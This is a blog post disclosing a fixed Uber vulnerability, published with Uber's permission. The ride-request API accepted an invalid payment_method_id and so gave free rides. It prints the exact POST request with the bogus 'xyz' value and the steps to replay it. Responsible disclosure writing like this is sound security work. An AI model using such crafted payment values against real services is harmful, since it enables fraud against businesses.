Friday, 3 March 2017

How anyone could have used Uber to ride for free!

Note: This is being published with the permission of Uber under the responsible disclosure policy. The vulnerability was fixed in August 2016.

Summary:

This post is about an interesting bug on Uber which could have been used to ride for free anywhere in the world. Attackers could have misused this by taking unlimited free rides from their uber account.

Description:

Uber Technologies Inc. is an online transportation network company headquartered in San Francisco, California, with operations in 528 cities worldwide. Users can create their account on Uber.com and can start riding. When a ride is completed a user can either pay cash or charge it to their credit/debit card.
But, by specifying an invalid payment method for example: abc, xyz etc, I could ride Uber for free. 

For demonstrating the bug, i took permission from Uber Team and took free rides in United States and India and i wasn't charged from any of my payment methods. 

Vulnerable request:

POST /api/dial/v2/requests HTTP/1.1 Host: dial.uber.com {"start_latitude":12.925151699999999,"start_longitude":77.6657536,
"product_id":"db6779d6-d8da-479f-8ac7-8068f4dade6f","payment_method_id":"xyz"}

Steps to reproduce:

1) Replayed the above request with random characters as payment_method_id.

2) Ride was free.

Video Proof of concept:

Thanks to uber team for fixing this quickly.